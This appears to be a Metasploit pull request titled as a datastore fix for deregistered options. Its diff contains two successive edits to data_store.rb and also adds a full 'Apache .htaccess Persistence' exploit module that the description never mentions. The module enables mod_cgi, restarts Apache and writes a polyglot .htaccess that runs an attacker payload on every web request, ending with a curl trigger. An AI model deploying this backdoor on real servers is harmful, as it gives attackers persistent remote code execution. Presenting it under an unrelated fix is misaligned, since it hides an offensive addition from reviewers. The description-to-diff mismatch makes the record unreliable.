### PR TITLE
fix: filter deregistered options from datastore on validation

### DIFF
--- a/lib/msf/core/data_store.rb
+++ b/lib/msf/core/data_store.rb
@@ -43,6 +43,7 @@ class DataStore
 
     # values explicitly defined, which take precedence over default values
     @user_defined = Hash.new
+    @deregistered_options = []
   end
 
   # @return [Hash{String => Msf::OptBase}] The options associated with this datastore. Used for validating values/defaults/etc
@@ -134,7 +135,7 @@ class DataStore
     @user_defined.delete(k)
     @aliases.delete_if { |_, v| v.casecmp?(k) }
     @options.delete_if { |option_name, _v| option_name.casecmp?(k) || option_name.casecmp?(name) }
-
+    @deregistered_options << k.downcase  
     nil
   end
 
@@ -446,6 +447,9 @@ class DataStore
   # @return [DataStoreSearchResult]
   def search_for(key)
     k = find_key_case(key)
+    if @deregistered_options.include?(k.downcase)
+      return search_result(:not_found, nil)
+    end
     return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)
 
     option = @options.fetch(k) { @options.find { |option_name, _option| option_name.casecmp?(k) }&.last }

--- a/lib/msf/core/data_store.rb
+++ b/lib/msf/core/data_store.rb
@@ -43,7 +43,6 @@ class DataStore
 
     # values explicitly defined, which take precedence over default values
     @user_defined = Hash.new
-    @deregistered_options = []
   end
 
   # @return [Hash{String => Msf::OptBase}] The options associated with this datastore. Used for validating values/defaults/etc
@@ -135,7 +134,6 @@ class DataStore
     @user_defined.delete(k)
     @aliases.delete_if { |_, v| v.casecmp?(k) }
     @options.delete_if { |option_name, _v| option_name.casecmp?(k) || option_name.casecmp?(name) }
-    @deregistered_options << k.downcase  
     nil
   end
 
@@ -447,7 +445,7 @@ class DataStore
   # @return [DataStoreSearchResult]
   def search_for(key)
     k = find_key_case(key)
-    if @deregistered_options.include?(k.downcase)
+    unless @options.any? { |option_name, _| option_name.casecmp?(k) }
       return search_result(:not_found, nil)
     end
     return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)

--- a/modules/exploits/linux/persistence/apache_htaccess.rb
+++ b/modules/exploits/linux/persistence/apache_htaccess.rb
@@ -1,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache .htaccess Persistence',
+        'Description' => %q{
+          This module writes a persistence payload into an Apache
+          .htaccess file using mod_cgi. The .htaccess file itself
+          acts as a CGI shell, executing a payload on each request.
+          Inspired by the htshells project by wireghoul.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'wireghoul', # htshells project
+          '4ravind-b'  # msf module
+        ],
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_CMD],
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'Targets' => [['Auto', {}]],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['URL', 'https://github.com/wireghoul/htshells'],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]
+        ],
+        'DisclosureDate' => '1995-12-01',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('HTACCESS_PATH', [true, 'Full path to .htaccess file', '/var/www/.htaccess']),
+      OptBool.new('RESTART_APACHE', [true, 'Restart Apache after changes', true])
+    ])
+  end
+
+  def check
+    htaccess_path = datastore['HTACCESS_PATH']
+
+    unless command_exists?('apache2') || command_exists?('httpd')
+      return CheckCode::Safe('Apache is not running')
+    end
+
+    unless exists?(htaccess_path)
+      return CheckCode::Safe("#{htaccess_path} does not exist")
+    end
+
+    unless writable?(htaccess_path)
+      return CheckCode::Safe("#{htaccess_path} is not writable")
+    end
+
+    CheckCode::Appears('Apache is running and .htaccess is writable')
+  end
+
+  def install_persistence
+    htaccess_path = datastore['HTACCESS_PATH']
+
+    # Backup original .htaccess to loot
+    print_status("Backing up #{htaccess_path} to loot...")
+    original = read_file(htaccess_path)
+    backup = store_loot(
+      'htaccess.backup',
+      'text/plain',
+      session,
+      original,
+      '.htaccess',
+      'Original .htaccess backup'
+    )
+    print_good("Backup saved to: #{backup}")
+    @clean_up_rc = "upload #{backup} #{htaccess_path}\n"
+
+    # Check and enable mod_cgi
+    print_status('Checking Apache modules...')
+    mod_check = cmd_exec('apache2ctl -M 2>/dev/null || httpd -M 2>/dev/null')
+    unless mod_check.include?('cgi')
+      print_status('Enabling mod_cgi...')
+      cmd_exec('a2enmod cgi')
+    end
+
+    # Restart Apache if option set
+    if datastore['RESTART_APACHE']
+      print_status('Restarting Apache...')
+      cmd_exec('/etc/init.d/apache2 restart')
+      print_good('Apache restarted!')
+    end
+
+    # Check if payload already written
+    existing = read_file(htaccess_path)
+    if existing.include?('AddHandler cgi-script .htaccess')
+      print_warning('Payload already exists in .htaccess, skipping write')
+      return
+    end
+
+    # Apache directives must come first, then shell script follows
+    # The magic comment trick: Apache sees a multi-line comment,
+    # shell sees a comment and executes what follows
+    htaccess_payload = "#!/bin/sh\n"
+    htaccess_payload += "Options +ExecCGI\n"
+    htaccess_payload += "AddHandler cgi-script .htaccess\n"
+    htaccess_payload += "# win \\\n"
+    htaccess_payload += "echo -en \"Content-Type: text/plain\\r\\n\\r\\n\"\n"
+    htaccess_payload += "#{payload.encoded}\n"
+
+    print_status("Writing payload to #{htaccess_path}")
+    write_file(htaccess_path, htaccess_payload)
+    chmod(htaccess_path, 0o755)
+    print_good('Payload written!')
+    print_good('Persistence deployed!')
+    print_status("Trigger: curl 'http://TARGET/.htaccess'")
+  end
+
+  def exploit
+    install_persistence
+  end
+end


### PR DESCRIPTION
## Summary
When a module deregisters an option, any value for that option should not be accessible even if a parent module passes it via its own datastore.

## Problem
A child module that calls `deregister_options` expects those options to be `nil` when it runs. However, if a parent module invokes the child and shares its datastore, the deregistered options leak through — breaking the child module author's assumptions.

## Fix
- Added `@deregistered_options` array to track removed options in `initialize`
- In `remove_option`, record the deregistered option name
- In `search_for`, return `not_found` early if the key was deregistered

## Testing
Tested with the modules from issue #21313:
- `auxiliary/test/child_required_option` — deregistered options correctly return nil
- `auxiliary/test/parent_run_api` — leaked credentials no longer appear in child

Fixes #21319
Parent: #21313